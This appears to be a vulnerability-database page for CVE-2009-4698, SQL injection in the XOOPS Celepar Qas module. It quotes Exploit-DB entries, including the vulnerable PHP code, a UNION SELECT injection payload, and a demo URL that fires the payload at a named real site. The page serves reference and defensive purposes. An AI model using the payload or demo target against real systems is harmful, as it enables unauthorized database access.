CVE-2009-4698
published 2010-03-15CVE-2009-4698: Multiple SQL injection vulnerabilities in the Qas (aka Quas) module for XOOPS Celepar allow remote attackers to execute arbitrary SQL commands via the codigo…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.71%
74.4th percentile
Multiple SQL injection vulnerabilities in the Qas (aka Quas) module for XOOPS Celepar allow remote attackers to execute arbitrary SQL commands via the codigo parameter to (1) aviso.php and (2) imprimir.php, and the (3) cod_categoria parameter to categoria.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alexandre_amaral | xoops_celepar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
exploitdb·2009-07-27
CVE-2009-4698 XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
---
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
[»] Script: [ Xoops Celepar Module Qas ]
[»] Language: [ PHP ]
[»] Download: [ http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke
Exploit-DB
XOOPS Celepar Module Qas - 'codigo' SQL Injection
exploitdb·2009-07-24
CVE-2009-4714 XOOPS Celepar Module Qas - 'codigo' SQL Injection
XOOPS Celepar Module Qas - 'codigo' SQL Injection
---
Xoops Celepar Module Qas
Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail:[email protected]
A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php .
Source code:
}
$codigo = $_POST['codigo'];
} else
$codigo = $_GET['codigo'];
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel]
[From Brazil]
# milw0rm.com [2009-07-24]
No writeups or analysis indexed.
http://osvdb.org/56593http://osvdb.org/56595http://secunia.com/advisories/35966http://www.exploit-db.com/exploits/9249http://www.exploit-db.com/exploits/9261http://www.osvdb.org/56594http://www.securityfocus.com/bid/35820https://exchange.xforce.ibmcloud.com/vulnerabilities/51985http://osvdb.org/56593http://osvdb.org/56595http://secunia.com/advisories/35966http://www.exploit-db.com/exploits/9249http://www.exploit-db.com/exploits/9261http://www.osvdb.org/56594http://www.securityfocus.com/bid/35820https://exchange.xforce.ibmcloud.com/vulnerabilities/51985
2010-03-15
Published